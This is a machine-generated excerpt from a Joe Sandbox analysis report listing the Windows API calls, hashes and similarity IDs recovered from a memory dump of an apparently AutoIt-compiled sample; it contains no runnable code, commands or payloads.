                                                                                                                  • Instruction ID: 8ac46d2668ea0e21b2abbb378ba9cfd482a54fc924b6e3bc618314e89ed39a91
                                                                                                                  • Opcode Fuzzy Hash: c107ebc385c710802332cc42bd71d39fac8e605073d533414b885d117b071a35
                                                                                                                  • Instruction Fuzzy Hash: 24218331280606BBDB169F609C10F7BB7AAFB44715F14801EFA46D7650DB71E411AB74
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DABCD9
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00DABCE0
                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00DABCFA
                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DABD29
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2621361867-0
                                                                                                                  • Opcode ID: 19f1f45a6d8cbd4d5305beea02ebafdd880f4cac069636f5d3839129a6acb798
                                                                                                                  • Instruction ID: 5153e3a6a46fbc963b46aa12b14285b04ecbf3076c230c6b0bffce8b0471c1d8
                                                                                                                  • Opcode Fuzzy Hash: 19f1f45a6d8cbd4d5305beea02ebafdd880f4cac069636f5d3839129a6acb798
                                                                                                                  • Instruction Fuzzy Hash: 2A214272101209ABDF019FA4DD49FEE7BAAEF46324F148015FA01A6161C776DD52DB70
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00DD88A3
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DD88BD
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DD88CB
                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DD88D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2169480361-0
                                                                                                                  • Opcode ID: 52cd2f1edfac931e8de719320be10cd4c2452056a484d9db912b0ce60d395896
                                                                                                                  • Instruction ID: 71b9cb28c0d2dacaaf3cf3d8ec9d3310cd8871e2826d8405902abc0b4a9d013e
                                                                                                                  • Opcode Fuzzy Hash: 52cd2f1edfac931e8de719320be10cd4c2452056a484d9db912b0ce60d395896
                                                                                                                  • Instruction Fuzzy Hash: 2A118131245114AFDB15AB28DC05FBA7BAAEF85320F14811AF916D73E1DB70AD00EBB0
                                                                                                                  APIs
                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00DC906D
                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00DC907F
                                                                                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 00DC908C
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC90A3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 385091864-0
                                                                                                                  • Opcode ID: 976ed52c1696de7604d5fcd87121765ccf0251c1232a7f719299cde93a4e4950
                                                                                                                  • Instruction ID: 26d4f96c94c11c4d90278bd582adf07e22680a029be2ad915d5b91c4bc725477
                                                                                                                  • Opcode Fuzzy Hash: 976ed52c1696de7604d5fcd87121765ccf0251c1232a7f719299cde93a4e4950
                                                                                                                  • Instruction Fuzzy Hash: 632157715001149FC710DF69C855AAEBBFDEF49710F108169F84AD7290DB74D941CBB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00DB18FD,?,?,?,00DB26BC,00000000,000000EF,00000119,?,?), ref: 00DB2CB9
                                                                                                                    • Part of subcall function 00DB2CAA: lstrcpyW.KERNEL32(00000000,?,?,00DB18FD,?,?,?,00DB26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DB2CDF
                                                                                                                    • Part of subcall function 00DB2CAA: lstrcmpiW.KERNEL32(00000000,?,00DB18FD,?,?,?,00DB26BC,00000000,000000EF,00000119,?,?), ref: 00DB2D10
                                                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00DB26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DB1916
                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00DB26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DB193C
                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DB26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DB1970
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                  • String ID: cdecl
                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                  • Opcode ID: 5187bbd27314ea170f515d80d76f5d1dcf2b64b3eff3f20f4520dc814f715b59
                                                                                                                  • Instruction ID: 7485707e3a761f443105245a463633ecdee5ae6bc1790290e37b34373308915b
                                                                                                                  • Opcode Fuzzy Hash: 5187bbd27314ea170f515d80d76f5d1dcf2b64b3eff3f20f4520dc814f715b59
                                                                                                                  • Instruction Fuzzy Hash: B111AF3A100341EFDB15AF34D855ABA77A9FF45350B84802AE806CB254EB319951CBB0
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00DB715C
                                                                                                                  • _memset.LIBCMT ref: 00DB717D
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00DB71CF
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DB71D8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1157408455-0
                                                                                                                  • Opcode ID: 12998758faec85e7d7c8d59f3ee5e5c085a0b7c73fcaa648892ba5b96b1db2e7
                                                                                                                  • Instruction ID: 5ea9d9dec3e82a914f4cd6b95c874f6209cbf061ac082d35c50d3711dffb2cc6
                                                                                                                  • Opcode Fuzzy Hash: 12998758faec85e7d7c8d59f3ee5e5c085a0b7c73fcaa648892ba5b96b1db2e7
                                                                                                                  • Instruction Fuzzy Hash: C511E771901328BAD7205B69AC4DFEBBA7CEF45760F10419AF505E72D0D2704E80CBB4
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00DB13EE
                                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DB1409
                                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DB141F
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00DB1474
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3137044355-0
                                                                                                                  • Opcode ID: ff8f2f1991a59a716cd6b9eb0837c6082050f3a4ee8248bb45fa9d4c4814fd7f
                                                                                                                  • Instruction ID: 707ee1c45e8013bc236f00e4c83bfbf0d88578a9e058415d8cf8a9037002b84e
                                                                                                                  • Opcode Fuzzy Hash: ff8f2f1991a59a716cd6b9eb0837c6082050f3a4ee8248bb45fa9d4c4814fd7f
                                                                                                                  • Instruction Fuzzy Hash: A121AC79A00309EBDB209F90DC98AEBBBB9EF00744F808469E65397150DB70EA04DF70
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00DAC285
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DAC297
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DAC2AD
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DAC2C8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: 4bcbb34c30f585f113ba994e1b2e0d415a36661cea268fb87d0b9241160f9088
                                                                                                                  • Instruction ID: 881739ffaa420ce7b7a1203efe03b4cf0f53432870e4fac97bf057a60436b4ed
                                                                                                                  • Opcode Fuzzy Hash: 4bcbb34c30f585f113ba994e1b2e0d415a36661cea268fb87d0b9241160f9088
                                                                                                                  • Instruction Fuzzy Hash: 2B11187A941218FFEB11DBD8C885F9DBBB4FB09710F204091EA04B7294D671AE10DBA4
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00DB7C6C
                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00DB7C9F
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DB7CB5
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DB7CBC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2880819207-0
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D8C657
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00D8C66B
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8C675
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3970641297-0
                                                                                                                  APIs
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DB354D,?,00DB45D5,?,00008000), ref: 00DB49EE
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00DB354D,?,00DB45D5,?,00008000), ref: 00DB4A13
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DB354D,?,00DB45D5,?,00008000), ref: 00DB4A1D
                                                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00DB354D,?,00DB45D5,?,00008000), ref: 00DB4A50
                                                                                                                  Similarity
                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2875609808-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3016257755-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D9869D: __getptd_noexit.LIBCMT ref: 00D9869E
                                                                                                                  • __lock.LIBCMT ref: 00D9811F
                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00D9813C
                                                                                                                  • _free.LIBCMT ref: 00D9814F
                                                                                                                  • InterlockedIncrement.KERNEL32(017B77B8), ref: 00D98167
                                                                                                                  Similarity
                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2704283638-0
                                                                                                                  APIs
                                                                                                                  • __lock.LIBCMT ref: 00D98768
                                                                                                                    • Part of subcall function 00D98984: __mtinitlocknum.LIBCMT ref: 00D98996
                                                                                                                    • Part of subcall function 00D98984: RtlEnterCriticalSection.NTDLL(00D90127), ref: 00D989AF
                                                                                                                  • InterlockedIncrement.KERNEL32(DC840F00), ref: 00D98775
                                                                                                                  • __lock.LIBCMT ref: 00D98789
                                                                                                                  • ___addlocaleref.LIBCMT ref: 00D987A7
                                                                                                                  Similarity
                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1687444384-0
                                                                                                                  APIs
                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00DB9C7F
                                                                                                                    • Part of subcall function 00DBAD14: _memset.LIBCMT ref: 00DBAD49
                                                                                                                  • _memmove.LIBCMT ref: 00DB9CA2
                                                                                                                  • _memset.LIBCMT ref: 00DB9CAF
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00DB9CBF
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 48991266-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D8B5EB
                                                                                                                    • Part of subcall function 00D8B58B: SelectObject.GDI32(?,00000000), ref: 00D8B5FA
                                                                                                                    • Part of subcall function 00D8B58B: BeginPath.GDI32(?), ref: 00D8B611
                                                                                                                    • Part of subcall function 00D8B58B: SelectObject.GDI32(?,00000000), ref: 00D8B63B
                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DDE860
                                                                                                                  • LineTo.GDI32(00000000,?,?), ref: 00DDE86D
                                                                                                                  • EndPath.GDI32(00000000), ref: 00DDE87D
                                                                                                                  • StrokePath.GDI32(00000000), ref: 00DDE88B
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1539411459-0
                                                                                                                  • Opcode ID: 1279d4663c9a7974ea2f9007eb72728735c9f4851dfbe191a61230775734fd61
                                                                                                                  • Instruction ID: e573c7ad7fca3da3d0be7736b627a99ab111424f3d4b27ac64cd879c12db84e6
                                                                                                                  • Opcode Fuzzy Hash: 1279d4663c9a7974ea2f9007eb72728735c9f4851dfbe191a61230775734fd61
                                                                                                                  • Instruction Fuzzy Hash: 73F0BE31000759BADB162F50AC0DFDE3F9BAF06310F048142FA01642E18B754611DFB9
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00DAD640
                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DAD653
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00DAD65A
                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 00DAD661
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2710830443-0
                                                                                                                  • Opcode ID: d40ae3ae2fa30aab031031f26ef483177c4b47255778c634099503824e9ed501
                                                                                                                  • Instruction ID: fbf9983b2fcabaec4eee21e2facbdcb6fddda2673e6ff763459c711afa5b09d7
                                                                                                                  • Opcode Fuzzy Hash: d40ae3ae2fa30aab031031f26ef483177c4b47255778c634099503824e9ed501
                                                                                                                  • Instruction Fuzzy Hash: 3AE0397110132CBADB201BA2AC0DFEB7F1EEF167A1F048010B50DC5460CA719580CBB0
                                                                                                                  APIs
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00DABE01
                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00DAB9C9), ref: 00DABE08
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DAB9C9), ref: 00DABE15
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00DAB9C9), ref: 00DABE1C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3974789173-0
                                                                                                                  • Opcode ID: 3aa8ee912e0bb632c58199cad6a5a241f11995d90c20088fd80f28fe34cbb8e1
                                                                                                                  • Instruction ID: b2175b854875a6cae7768e5c539c62022d4d0035a5206cd6b05b8cb29b649505
                                                                                                                  • Opcode Fuzzy Hash: 3aa8ee912e0bb632c58199cad6a5a241f11995d90c20088fd80f28fe34cbb8e1
                                                                                                                  • Instruction Fuzzy Hash: BAE08632641311ABDB201FB19C0CBAB3BEAEF567A2F04C818F341DA150DB348542C771
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000008), ref: 00D8B0C5
                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00D8B0CF
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00D8B0E4
                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00D8B0EC
                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 00DEECFA
                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DEED07
                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00DEED20
                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00DEED39
                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00DEED59
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00DEED64
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1946975507-0
                                                                                                                  • Opcode ID: fc4c6415c31d8e83c843a10806046a0d4a0ad192214c24ee8f17f88234247d68
                                                                                                                  • Instruction ID: 58251981df06d1a532ae1d7fba6140683c9da538a592e6382f6e23121b3b4098
                                                                                                                  • Opcode Fuzzy Hash: fc4c6415c31d8e83c843a10806046a0d4a0ad192214c24ee8f17f88234247d68
                                                                                                                  • Instruction Fuzzy Hash: 6CE0ED31500380AEEB216F75EC4D7A83B23AB56336F18C266FA69981E6C7714541DB31
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: 025a6067d65d71901ce2a071c5923d0f831f3238438c04611e370974f48b3ce5
                                                                                                                  • Instruction ID: cbb72631179145dd91000cc73ae5250f9d5b08bb816c3a2c4f2bacc4099a0f3d
                                                                                                                  • Opcode Fuzzy Hash: 025a6067d65d71901ce2a071c5923d0f831f3238438c04611e370974f48b3ce5
                                                                                                                  • Instruction Fuzzy Hash: 46E07EB5540308EFDB006F609848A697BAAEB48361F15C815F98ACB351DAB599819B60
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: b649240f9b437087bcf379e038050bfdba954a266c8909668932b60277e53d6b
                                                                                                                  • Instruction ID: 62d5cd2377e69f66a7f3af8c7318ea3a902872df72167f6551661807c21f9564
                                                                                                                  • Opcode Fuzzy Hash: b649240f9b437087bcf379e038050bfdba954a266c8909668932b60277e53d6b
                                                                                                                  • Instruction Fuzzy Hash: D6E092B5540308AFDB006F709C4C6697BABEB48361F15C415F94ACB351DAB99981CB60
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: >$DEFINE
                                                                                                                  • API String ID: 4104443479-1664449232
                                                                                                                  • Opcode ID: 6fa841ccabd90fe9518e0bc74456af77624e8154fbbf919fff6e4e920414ec73
                                                                                                                  • Instruction ID: 7e7c63f38c46d57810b3b445758d5c853b1c6f25e843cb2357895763aff5ef7d
                                                                                                                  • Opcode Fuzzy Hash: 6fa841ccabd90fe9518e0bc74456af77624e8154fbbf919fff6e4e920414ec73
                                                                                                                  • Instruction Fuzzy Hash: 8B124975A0020ADFCB24CF58C4906BDBBB1FF48314F1AC15AE959AB351E770EA81CB60
                                                                                                                  APIs
                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00DAECA0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContainedObject
                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                  • API String ID: 3565006973-3941886329
